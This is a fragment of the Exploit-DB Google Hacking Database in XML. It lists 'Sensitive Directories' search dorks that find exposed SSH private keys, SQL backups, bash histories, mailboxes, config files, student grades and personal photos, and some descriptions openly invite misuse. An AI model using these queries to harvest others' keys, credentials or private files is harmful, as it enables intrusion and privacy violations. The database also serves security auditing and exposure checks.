<edb></edb>
<date>2015-09-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>4771</id>
<link>https://www.exploit-db.com/ghdb/4771</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index.of&quot; | inurl:/filemanager/connectors/ intext:uploadtest.html</shortDescription>
<textualDescription>Open Custom File Uploader specifically in &quot;/ FCKeditor/..&quot;
Author: Parth S. Patel
https://ca.linkedin.com/in/parthpateloscp
</textualDescription>
<query>intitle:&quot;index.of&quot; | inurl:/filemanager/connectors/ intext:uploadtest.html</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index.of&quot; | inurl:/filemanager/connectors/ intext:uploadtest.html</querystring>
<edb></edb>
<date>2018-04-16</date>
<author>Parth S. Patel</author>
</entry>
<entry>
<id>4770</id>
<link>https://www.exploit-db.com/ghdb/4770</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;Index.Of.Applications (Parallels)&quot; -stackoverflow -quora</shortDescription>
<textualDescription>Dork will give application folder of parallels virtual machines showing
what is installed in the virtual machines
Bruno Schmid
</textualDescription>
<query>intitle:&quot;Index.Of.Applications (Parallels)&quot; -stackoverflow -quora</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index.Of.Applications (Parallels)&quot; -stackoverflow -quora</querystring>
<edb></edb>
<date>2018-04-13</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>143</id>
<link>https://www.exploit-db.com/ghdb/143</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index.of.personal&quot;</shortDescription>
<textualDescription>This directory has various personal documents and pictures.</textualDescription>
<query>intitle:&quot;index.of.personal&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22index.of.personal%22&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2004-03-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>1033</id>
<link>https://www.exploit-db.com/ghdb/1033</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;pictures thumbnails&quot; site:pictures.sprintpcs.com</shortDescription>
<textualDescription>This search reveals the photo albums taken by Sprint PCS customers. Pictures taken with Sprint's cell phone service can be shared on their website. This search exposes the thumbnail album, only if the user has elected to share the photo album.Nothing like the Paris Hilton pictures, but there are pictures of people drunk at parties, dancing, girlfriens and so on.</textualDescription>
<query>intitle:&quot;pictures thumbnails&quot; site:pictures.sprintpcs.com</query>
<querystring>https://www.google.com/search?num=100&amp;q=intitle%3A%22pictures+thumbnails%22+site%3Apictures.sprintpcs.com</querystring>
<edb></edb>
<date>2005-07-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>510</id>
<link>https://www.exploit-db.com/ghdb/510</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;webadmin - /*&quot; filetype:php directory filename permission</shortDescription>
<textualDescription>Webadmin.php is a free simple Web-based file manager. This search finds sites that use this software. If left unprotected an attacker files can be modified or added on the server.More info and screenshot at: http://cker.name/webadmin/</textualDescription>
<query>intitle:&quot;webadmin - /*&quot; filetype:php directory filename permission</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=intitle%3A%22webadmin+-+%2F*%22+f</querystring>
<edb></edb>
<date>2004-09-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>5035</id>
<link>https://www.exploit-db.com/ghdb/5035</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:'index of' &quot;access_log&quot;</shortDescription>
<textualDescription>Find various Wordpress directories containing access logs.
intitle:'index of' &quot;access_log&quot;
Author : *.doc-TOR aka Brain Reflow https://twitter.com/The_d0c_T0R
</textualDescription>
<query>intitle:'index of' &quot;access_log&quot;</query>
<querystring>https://www.google.com/search?q=intitle:'index of' &quot;access_log&quot;</querystring>
<edb></edb>
<date>2018-11-27</date>
<author>Brain Reflow</author>
</entry>
<entry>
<id>5034</id>
<link>https://www.exploit-db.com/ghdb/5034</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:'index of' &quot;error_log&quot;</shortDescription>
<textualDescription>Find various Wordpress directories containing error logs.
intitle:'index of' &quot;error_log&quot;
Author : *.doc-TOR aka Brain Reflow https://twitter.com/The_d0c_T0R
</textualDescription>
<query>intitle:'index of' &quot;error_log&quot;</query>
<querystring>https://www.google.com/search?q=intitle:'index of' &quot;error_log&quot;</querystring>
<edb></edb>
<date>2018-11-27</date>
<author>Brain Reflow</author>
</entry>
<entry>
<id>6729</id>
<link>https://www.exploit-db.com/ghdb/6729</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:(&quot;Index of&quot; AND &quot;wp-content/plugins/boldgrid-backup/=&quot;)</shortDescription>
<textualDescription># Google Dork: intitle:(&quot;Index of&quot; AND &quot;wp-content/plugins/boldgrid-backup/=&quot;)
# Sensitive directories.
# Date: 15/12/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:(&quot;Index of&quot; AND &quot;wp-content/plugins/boldgrid-backup/=&quot;)</query>
<querystring>https://www.google.com/search?q=intitle:(&quot;Index of&quot; AND &quot;wp-content/plugins/boldgrid-backup/=&quot;)</querystring>
<edb></edb>
<date>2020-12-15</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4943</id>
<link>https://www.exploit-db.com/ghdb/4943</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:backup+index of</shortDescription>
<textualDescription>Checking for the public backup folder on the web server, It might include
the sensitive files or database.
Sang Bui
</textualDescription>
<query>intitle:backup+index of</query>
<querystring>https://www.google.com/search?q=intitle:backup+index of</querystring>
<edb></edb>
<date>2018-09-11</date>
<author>Sang Bui</author>
</entry>
<entry>
<id>4738</id>
<link>https://www.exploit-db.com/ghdb/4738</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:CV+index of</shortDescription>
<textualDescription>Able to search and download the CV from web directory.
Sang Bui
</textualDescription>
<query>intitle:CV+index of</query>
<querystring>https://www.google.com/search?q=intitle:CV+index of</querystring>
<edb></edb>
<date>2018-04-02</date>
<author>Sang Bui</author>
</entry>
<entry>
<id>8022</id>
<link>https://www.exploit-db.com/ghdb/8022</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:Index of &quot;/venv&quot;</shortDescription>
<textualDescription># Google Dork: intitle:Index of &quot;/venv&quot;
# Sensitive Directories
# Date: 08/09/2022
# Exploit Author: Abhishek Singh</textualDescription>
<query>intitle:Index of &quot;/venv&quot;</query>
<querystring>https://www.google.com/search?q=intitle:Index of &quot;/venv&quot;</querystring>
<edb></edb>
<date>2022-08-17</date>
<author>Abhishek Singh</author>
</entry>
<entry>
<id>7926</id>
<link>https://www.exploit-db.com/ghdb/7926</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:Index of &quot;pyvenv.cfg&quot;</shortDescription>
<textualDescription># Google Dork: intitle:Index of &quot;pyvenv.cfg&quot;
# Sensitive Directories
# Date: 07/02/2022
# Exploit Author: Devanshi Gajjar</textualDescription>
<query>intitle:Index of &quot;pyvenv.cfg&quot;</query>
<querystring>https://www.google.com/search?q=intitle:Index of &quot;pyvenv.cfg&quot;</querystring>
<edb></edb>
<date>2022-06-17</date>
<author>Devanshi Gajjar</author>
</entry>
<entry>
<id>5650</id>
<link>https://www.exploit-db.com/ghdb/5650</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:index of &quot;uploads&quot;</shortDescription>
<textualDescription># Google Dork : intitle:index of &quot;uploads&quot;
# Category : File contains Juicy items
# Date : 14-11-2019
# Author : Rohitreddy
</textualDescription>
<query>intitle:index of &quot;uploads&quot;</query>
<querystring>https://www.google.com/search?q=intitle:index of &quot;uploads&quot;</querystring>
<edb></edb>
<date>2019-11-20</date>
<author>Rohitreddy</author>
</entry>
<entry>
<id>6650</id>
<link>https://www.exploit-db.com/ghdb/6650</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:index of .git/hooks/</shortDescription>
<textualDescription>Dorks: intitle:index of .git/hooks/
Category: Sensitive Information
Summary: Contains sensitive info about the Github repository.
</textualDescription>
<query>intitle:index of .git/hooks/</query>
<querystring>https://www.google.com/search?q=intitle:index of .git/hooks/</querystring>
<edb></edb>
<date>2020-11-04</date>
<author>Prasad Lingamaiah</author>
</entry>
<entry>
<id>5021</id>
<link>https://www.exploit-db.com/ghdb/5021</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:index of /.sql.gz intext:/backup/</shortDescription>
<textualDescription>Exploit Title: This Google Dork discover to gathering information of database schema and credentials data of mysql backup
Google Dork: intitle:index of /.sql.gz intext:/backup/
Date: 2018-11-10
Exploit Author: blackcat
</textualDescription>
<query>intitle:index of /.sql.gz intext:/backup/</query>
<querystring>https://www.google.com/search?q=intitle:index of /.sql.gz intext:/backup/</querystring>
<edb></edb>
<date>2018-11-12</date>
<author>blackcat</author>
</entry>
<entry>
<id>4265</id>
<link>https://www.exploit-db.com/ghdb/4265</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:Index of /__MACOSX ...</shortDescription>
<textualDescription>MAC OS X. Parent Directory Wordpress information.
-Xploit </textualDescription>
<query>intitle:Index of /__MACOSX ...</query>
<querystring>https://www.google.com/search?q=intitle:Index of /__MACOSX ...</querystring>
<edb></edb>
<date>2016-04-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>5546</id>
<link>https://www.exploit-db.com/ghdb/5546</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:index.of &quot;admin&quot; filetype:sql</shortDescription>
<textualDescription>Google Dork: intitle:index.of &quot;admin&quot; filetype:sql
Date: 09/17/2019
Exploit Author: th3d3xt3r
</textualDescription>
<query>intitle:index.of &quot;admin&quot; filetype:sql</query>
<querystring>https://www.google.com/search?q=intitle:index.of &quot;admin&quot; filetype:sql</querystring>
<edb></edb>
<date>2019-09-18</date>
<author>The Dexter</author>
</entry>
<entry>
<id>5545</id>
<link>https://www.exploit-db.com/ghdb/5545</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:index.of &quot;admin.db&quot;</shortDescription>
<textualDescription>Google Dork: intitle:index.of &quot;admin.db&quot;
Date: 09/17/2019
Exploit Author: th3d3xt3r
</textualDescription>
<query>intitle:index.of &quot;admin.db&quot;</query>
<querystring>https://www.google.com/search?q=intitle:index.of &quot;admin.db&quot;</querystring>
<edb></edb>
<date>2019-09-18</date>
<author>The Dexter</author>
</entry>
<entry>
<id>5737</id>
<link>https://www.exploit-db.com/ghdb/5737</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:index.of &quot;backwpup&quot;</shortDescription>
<textualDescription>Dork : intitle:index.of &quot;backwpup&quot;
Author Gaurav Solanki (@heydarklord)
</textualDescription>
<query>intitle:index.of &quot;backwpup&quot;</query>
<querystring>https://www.google.com/search?q=intitle:index.of &quot;backwpup&quot;</querystring>
<edb></edb>
<date>2020-02-17</date>
<author>Gaurav Solanki</author>
</entry>
<entry>
<id>5648</id>
<link>https://www.exploit-db.com/ghdb/5648</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:index.of &quot;chroot.conf&quot;</shortDescription>
<textualDescription>Dork:
intitle:index.of &quot;chroot.conf&quot;
Author: Pankaj Kumar Thakur (Nepal)
Info:
It contains sensitive information
</textualDescription>
<query>intitle:index.of &quot;chroot.conf&quot;</query>
<querystring>https://www.google.com/search?q=intitle:index.of &quot;chroot.conf&quot;</querystring>
<edb></edb>
<date>2019-11-20</date>
<author>Pankaj Kumar Thakur</author>
</entry>
<entry>
<id>5608</id>
<link>https://www.exploit-db.com/ghdb/5608</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:index.of &quot;database.db&quot;</shortDescription>
<textualDescription> Sensitive Directories:
intitle:index.of &quot;database.db&quot;
Author: Ismail Tasdelen
</textualDescription>
<query>intitle:index.of &quot;database.db&quot;</query>
<querystring>https://www.google.com/search?q=intitle:index.of &quot;database.db&quot;</querystring>
<edb></edb>
<date>2019-10-30</date>
<author>Ismail Tasdelen</author>
</entry>
<entry>
<id>5741</id>
<link>https://www.exploit-db.com/ghdb/5741</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:index.of &quot;db.zip&quot;</shortDescription>
<textualDescription>Find database backup files.
--
*Hilary Soita.*
</textualDescription>
<query>intitle:index.of &quot;db.zip&quot;</query>
<querystring>https://www.google.com/search?q=intitle:index.of &quot;db.zip&quot;</querystring>
<edb></edb>
<date>2020-02-19</date>
<author>Hilary Soita</author>
</entry>
<entry>
<id>5634</id>
<link>https://www.exploit-db.com/ghdb/5634</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:index.of &quot;htaccess.txt&quot;</shortDescription>
<textualDescription>Dork:
intitle:index.of &quot;htaccess.txt&quot;
Author:Ismail Tasdelen
Info:
It contains htaccess.txt clear text sensitive information.
</textualDescription>
<query>intitle:index.of &quot;htaccess.txt&quot;</query>
<querystring>https://www.google.com/search?q=intitle:index.of &quot;htaccess.txt&quot;</querystring>
<edb></edb>
<date>2019-11-11</date>
<author>Ismail Tasdelen</author>
</entry>
<entry>
<id>5617</id>
<link>https://www.exploit-db.com/ghdb/5617</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:index.of &quot;system.db&quot;</shortDescription>
<textualDescription>Sensitive Directories:
intitle:index.of &quot;system.db&quot;
intitle:index.of &quot;hash.db&quot;
intitle:index.of &quot;sql.db&quot;
Author: Ismail Tasdelen
</textualDescription>
<query>intitle:index.of &quot;system.db&quot;</query>
<querystring>https://www.google.com/search?q=intitle:index.of &quot;system.db&quot;</querystring>
<edb></edb>
<date>2019-11-04</date>
<author>Ismail Tasdelen</author>
</entry>
<entry>
<id>7133</id>
<link>https://www.exploit-db.com/ghdb/7133</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:index.of (inurl:admin | intitle:admin)</shortDescription>
<textualDescription># Google Dork: intitle:index.of (inurl:admin | intitle:admin)
# Pages Containing Login Portals
# Date: 16/08/2021
# Exploit Author: Saurabh Gupta</textualDescription>
<query>intitle:index.of (inurl:admin | intitle:admin)</query>
<querystring>https://www.google.com/search?q=intitle:index.of (inurl:admin | intitle:admin)</querystring>
<edb></edb>
<date>2021-08-25</date>
<author>Saurabh Gupta</author>
</entry>
<entry>
<id>488</id>
<link>https://www.exploit-db.com/ghdb/488</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:index.of (inurl:fileadmin | intitle:fileadmin)</shortDescription>
<textualDescription>TYPO3 is a free Open Source content management system for enterprise purposes on the web and in intranets, featuring a set of ready-made interfaces, functions and modules.The fileadmin directory is the storage for all user data like website templates, graphics, documents and so on. Normally no sensitive data will be stored here except the one made available in restricted areas.Unprotected fileadmin directories can be found by an attacker using this query.Vendor: http://www.typo3.com/</textualDescription>
<query>intitle:index.of (inurl:fileadmin | intitle:fileadmin)</query>
<querystring>https://www.google.com/search?q=intitle%3Aindex.of+%28inurl%3Afileadmin+%7C+intitle%3Afileadmin%29</querystring>
<edb></edb>
<date>2004-09-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>3999</id>
<link>https://www.exploit-db.com/ghdb/3999</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:index.of +&quot;Indexed by Apache::Gallery&quot;</shortDescription>
<textualDescription>Google dork for finding Private pics ;) :D
#13lacKDemOn</textualDescription>
<query>intitle:index.of +&quot;Indexed by Apache::Gallery&quot;</query>
<querystring>https://www.google.com/search?q=intitle:index.of +&quot;Indexed by Apache::Gallery&quot;</querystring>
<edb></edb>
<date>2015-04-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>4623</id>
<link>https://www.exploit-db.com/ghdb/4623</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:index.of .bashrc</shortDescription>
<textualDescription>Google Dork Search: *intitle:index.of .bashrc*
*Explanation: *
Bash allows us to create our own shortcuts through the use of aliases and
shell functions. Aliases can be declared in bash files. These aliases will
last as long as our shell session is present.
To create an alias insert the following command in to .bashrc file
*alias alias_name=&quot;command_to_run&quot;*
Apache server comes with a default offline .bashrc file which can be
exploited further if the alias commands are found.
*Remediation:*
1. Disable Directory listing in the server.
2. Remove .bashrc files in the production server or remove the Read / Write
permission of the file through internet.
*Author: *Melvin Varkey
</textualDescription>
<query>intitle:index.of .bashrc</query>
<querystring>https://www.google.com/search?q=intitle:index.of .bashrc</querystring>
<edb></edb>
<date>2017-11-28</date>
<author>Melvin Varkey</author>
</entry>
<entry>
<id>453</id>
<link>https://www.exploit-db.com/ghdb/453</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:index.of /AlbumArt_</shortDescription>
<textualDescription>Directories containing commercial music.AlbumArt_{.*}.jpg are download/create by MS-Windows Media Player in music directory.</textualDescription>
<query>intitle:index.of /AlbumArt_</query>
<querystring>https://www.google.com/search?hl=de&amp;q=intitle%3Aindex.of+%2FAlbumArt_&amp;btnG=Google-Suche</querystring>
<edb></edb>
<date>2004-08-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>916</id>
<link>https://www.exploit-db.com/ghdb/916</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:index.of /maildir/new/</shortDescription>
<textualDescription>search gives you a mailbox dir. Contains a lot of mails.</textualDescription>
<query>intitle:index.of /maildir/new/</query>
<querystring>https://www.google.com/search?q=intitle%3Aindex.of+%2Fmaildir%2Fnew%2F</querystring>
<edb></edb>
<date>2005-03-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>786</id>
<link>https://www.exploit-db.com/ghdb/786</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:index.of abyss.conf</shortDescription>
<textualDescription>These directories reveal the configuration file of the abyss webserver. These files can contain passwords.</textualDescription>
<query>intitle:index.of abyss.conf</query>
<querystring>https://www.google.com/search?q=intitle%3Aindex.of+abyss.conf</querystring>
<edb></edb>
<date>2004-12-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>1429</id>
<link>https://www.exploit-db.com/ghdb/1429</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:index.of cisco asa -site:cisco.com</shortDescription>
<textualDescription>Google search for Pix/Asa images
Author: fdisk</textualDescription>
<query>intitle:index.of cisco asa -site:cisco.com</query>
<querystring>https://www.google.com/search?q=intitle%3Aindex.of+cisco+asa+-site%3Acisco.com+-inurl&amp;num=10&amp;ft=i&amp;cr=&amp;safe=images</querystring>
<edb></edb>
<date>2010-11-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>4769</id>
<link>https://www.exploit-db.com/ghdb/4769</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:index.of home/000~root~000/</shortDescription>
<textualDescription>This Dork lists files under Root Directory.
Author: Parth S. Patel
</textualDescription>
<query>intitle:index.of home/000~root~000/</query>
<querystring>https://www.google.com/search?q=intitle:index.of home/000~root~000/</querystring>
<edb></edb>
<date>2018-04-13</date>
<author>Parth S. Patel</author>
</entry>
<entry>
<id>4898</id>
<link>https://www.exploit-db.com/ghdb/4898</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:index.of id_rsa -id_rsa.pub</shortDescription>
<textualDescription>A simple dork to find SSH private keys indexed by google! Where many of the keys work
Have Responsibly fun!
__________________________________
Securitybits.io
</textualDescription>
<query>intitle:index.of id_rsa -id_rsa.pub</query>
<querystring>https://www.google.com/search?q=intitle:index.of id_rsa -id_rsa.pub</querystring>
<edb></edb>
<date>2018-08-02</date>
<author>Securitybits.io</author>
</entry>
<entry>
<id>3858</id>
<link>https://www.exploit-db.com/ghdb/3858</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:index.of intext:.bash_history</shortDescription>
<textualDescription>the GHDB on subject (intitle:index.of intext:.bash_history) finds all
home users directory path indexed. I've test it and google return 943
results!
-Andrea Menin</textualDescription>
<query>intitle:index.of intext:.bash_history</query>
<querystring>https://www.google.com/search?q=intitle:index.of intext:.bash_history</querystring>
<edb></edb>
<date>2013-08-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>4584</id>
<link>https://www.exploit-db.com/ghdb/4584</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:index.of intext:viewvc</shortDescription>
<textualDescription>ViewVC is a browser interface for CVS and Subversion version control
repositories. This dork allows you to list those that are indexed and open
for viewing.
Some contain source code, private SSH keys, configuration files, and more.
--
paragonsec</textualDescription>
<query>intitle:index.of intext:viewvc</query>
<querystring>https://www.google.com/search?q=intitle:index.of intext:viewvc</querystring>
<edb></edb>
<date>2017-10-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>4108</id>
<link>https://www.exploit-db.com/ghdb/4108</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:index.of inurl:grades site:edu</shortDescription>
<textualDescription>Directories containing grades.
Decoy</textualDescription>
<query>intitle:index.of inurl:grades site:edu</query>
<querystring>https://www.google.com/search?q=intitle:index.of inurl:grades site:edu</querystring>
<edb></edb>
<date>2015-11-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>1430</id>
<link>https://www.exploit-db.com/ghdb/1430</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:index.of ios -site:cisco.com</shortDescription>
<textualDescription>Google search for Cisco IOS images
Author: fdisk</textualDescription>
<query>intitle:index.of ios -site:cisco.com</query>
<querystring>https://www.google.com/search?q=intitle%3Aindex.of+ios+-site%3Acisco.com+-inurl&amp;num=10&amp;ft=i&amp;cr=&amp;safe=images</querystring>
<edb></edb>
<date>2010-11-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>4107</id>
<link>https://www.exploit-db.com/ghdb/4107</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:index.of parent inurl:repos</shortDescription>
<textualDescription>http://www.google.com/search?q=intitle:index.of parent inurl:repos
Shared repositories. Very interesting...
Decoy</textualDescription>
<query>intitle:index.of parent inurl:repos</query>
<querystring>https://www.google.com/search?q=intitle:index.of parent inurl:repos</querystring>
<edb></edb>
<date>2015-10-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>970</id>
<link>https://www.exploit-db.com/ghdb/970</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:index.of WEB-INF</shortDescription>
<textualDescription>Finds java powered web servers which have indexing enabled on their config directory</textualDescription>
<query>intitle:index.of WEB-INF</query>
<querystring>https://www.google.com/search?q=%0D%0Aintitle%3Aindex.of+WEB-INF</querystring>
<edb></edb>
<date>2005-05-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>5397</id>
<link>https://www.exploit-db.com/ghdb/5397</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:index.of./.db</shortDescription>
<textualDescription>dork to find the database information.
Dork : intitle:index.of./.db
</textualDescription>
<query>intitle:index.of./.db</query>
<querystring>https://www.google.com/search?q=intitle:index.of./.db</querystring>
<edb></edb>
<date>2019-08-19</date>
<author>Hari Prasad T.</author>
</entry>
<entry>
<id>5523</id>
<link>https://www.exploit-db.com/ghdb/5523</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:index.of./.htaccess</shortDescription>
<textualDescription>Dork Description : intitle:index.of./.htaccess
Category : Sensitive Directories.
</textualDescription>
<query>intitle:index.of./.htaccess</query>
<querystring>https://www.google.com/search?q=intitle:index.of./.htaccess</querystring>
<edb></edb>
<date>2019-09-12</date>
<author>Thejus Krishnan</author>
</entry>
<entry>
<id>5361</id>
<link>https://www.exploit-db.com/ghdb/5361</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:index.of./.sql</shortDescription>
<textualDescription>I found a dork using which .SQL files can be downloaded from websites.
Here is the dork :
intitle:index.of./.sql
Sourajeet Majumder
</textualDescription>
<query>intitle:index.of./.sql</query>
<querystring>https://www.google.com/search?q=intitle:index.of./.sql</querystring>
<edb></edb>
<date>2019-08-16</date>
<author>Sourajeet Majumder</author>
</entry>
<entry>
<id>5369</id>
<link>https://www.exploit-db.com/ghdb/5369</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:index.of.?.bak</shortDescription>
<textualDescription>Google Dork: intitle:index.of.?.bak
Category: Sensitive Directories
Description:
Used to find sensitive .bak files which are backup files, in
webapplications.
Author Name: Abhishek Sidharth
</textualDescription>
<query>intitle:index.of.?.bak</query>
<querystring>https://www.google.com/search?q=intitle:index.of.?.bak</querystring>
<edb></edb>
<date>2019-08-19</date>
<author>Abhishek Sidharth</author>
</entry>
<entry>
<id>5447</id>
<link>https://www.exploit-db.com/ghdb/5447</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:index.of.?.database</shortDescription>
<textualDescription>Google Dork: intitle:index.of.?.database
Category: Sensitive Directories
Description:
Used to find sensitive database files (*.sql) from the website directory
Author: Midhun Biju
</textualDescription>
<query>intitle:index.of.?.database</query>
<querystring>https://www.google.com/search?q=intitle:index.of.?.database</querystring>
<edb></edb>
<date>2019-08-26</date>
<author>Midhun Biju</author>
</entry>
<entry>
<id>5455</id>
<link>https://www.exploit-db.com/ghdb/5455</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:index.of.?.login</shortDescription>
<textualDescription>Descriptiton:
Used to find user authentication files from the website directory
</textualDescription>
<query>intitle:index.of.?.login</query>
<querystring>https://www.google.com/search?q=intitle:index.of.?.login</querystring>
<edb></edb>
<date>2019-08-27</date>
<author>Akhil G Krishnan</author>
</entry>
<entry>
<id>5419</id>
<link>https://www.exploit-db.com/ghdb/5419</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:index.of.?.mysql</shortDescription>
<textualDescription>Google Dork: intitle:index.of.?.mysql
Category: Sensitive Directories
Description:
Used to find sensitive .mysql files
</textualDescription>
<query>intitle:index.of.?.mysql</query>
<querystring>https://www.google.com/search?q=intitle:index.of.?.mysql</querystring>
<edb></edb>
<date>2019-08-21</date>
<author>Nanda Krishna</author>
</entry>
<entry>
<id>5312</id>
<link>https://www.exploit-db.com/ghdb/5312</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:index.of.?.sql</shortDescription>
<textualDescription>I found a dork which lead to download .sql files from website. The dork is
*DORK :&quot; ** intitle:index.of.?.sql **&quot; *
</textualDescription>
<query>intitle:index.of.?.sql</query>
<querystring>https://www.google.com/search?q=intitle:index.of.?.sql</querystring>
<edb></edb>
<date>2019-08-02</date>
<author>Anil Tom</author>
</entry>
<entry>
<id>4000</id>
<link>https://www.exploit-db.com/ghdb/4000</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:index.of.accounts</shortDescription>
<textualDescription>Dork for directory with accounts.
By Rootkit.</textualDescription>
<query>intitle:index.of.accounts</query>
<querystring>https://www.google.com/search?q=intitle:index.of.accounts</querystring>
<edb></edb>
<date>2015-04-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>1398</id>
<link>https://www.exploit-db.com/ghdb/1398</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:index.of.config</shortDescription>
<textualDescription>These directories can give information about a web servers configuration. This should never be viewable to the public as some files may contain cleartext of encrypted passwords, depending on the level of security. It can also contain information on various ports, security permisions..etc.</textualDescription>
<query>intitle:index.of.config</query>
<querystring>https://www.google.com/search?safe=off&amp;q=intitle%3Aindex.of.config</querystring>
<edb></edb>
<date>2006-07-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>4001</id>
<link>https://www.exploit-db.com/ghdb/4001</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:index.of.dropbox</shortDescription>
<textualDescription>Sensitive Directories
Ariel Anonis - @ariel_anonis</textualDescription>
<query>intitle:index.of.dropbox</query>
<querystring>https://www.google.com/search?q=intitle:index.of.dropbox</querystring>
<edb></edb>
<date>2015-04-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>4132</id>
<link>https://www.exploit-db.com/ghdb/4132</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:index.of.mail</shortDescription>
<textualDescription>Dork with juicy info. Enjoy xD.
Dork by Rootkit Pentester.</textualDescription>
<query>intitle:index.of.mail</query>
<querystring>https://www.google.com/search?q=intitle:index.of.mail</querystring>
<edb></edb>
<date>2015-11-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>4033</id>
<link>https://www.exploit-db.com/ghdb/4033</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:index.of.pubs</shortDescription>
<textualDescription>Exploit title: intitle:index.of.pubs
Description: intitle:index.of.pubs
Sensitive Directories
Author:fidah.org</textualDescription>
<query>intitle:index.of.pubs</query>
<querystring>https://www.google.com/search?q=intitle:index.of.pubs</querystring>
<edb></edb>
<date>2015-07-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>234</id>
<link>https://www.exploit-db.com/ghdb/234</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:intranet inurl:intranet +intext:&quot;human resources&quot;</shortDescription>
<textualDescription>According to whatis.com: &quot;An intranet is a private network that is contained within an enterprise. [...] The main purpose of an intranet is to share company information and computing resources among employees [...] and in general looks like a private version of the Internet.&quot;This search allows you to not only access a companies private network, but also provides employee listings and other sensitive information that can be incredibly useful for any social engineering endeavour</textualDescription>
<query>intitle:intranet inurl:intranet +intext:&quot;human resources&quot;</query>
<querystring>https://www.google.com/search?ie=utf-8&amp;oe=utf-8&amp;q=intitle%3Aintranet+inurl%3Aintranet+%2Bintext%3A%22human+resources%22</querystring>
<edb></edb>
<date>2004-05-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>802</id>
<link>https://www.exploit-db.com/ghdb/802</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:upload inurl:upload intext:upload -forum -shop -support -w3c</shortDescription>
<textualDescription>The search reveals server upload portals.An attacker can use server space for his own benefit.</textualDescription>
<query>intitle:upload inurl:upload intext:upload -forum -shop -support -w3c</query>
<querystring>https://www.google.com/search?q=intitle%3Aupload+inurl%3Aupload+intext%3Aupload+-forum+-shop+-support+-w3c+&amp;sourceid=mozilla-search&amp;start=0&amp;start=0&amp;ie=utf-8&amp;oe=utf-8&amp;rls=org.mozilla:en</querystring>
<edb></edb>
<date>2005-01-01</date>
<author>anonymous</author>
</entry>
<entry>
<id>4772</id>
<link>https://www.exploit-db.com/ghdb/4772</link>
<category>Sensitive Directories</category>
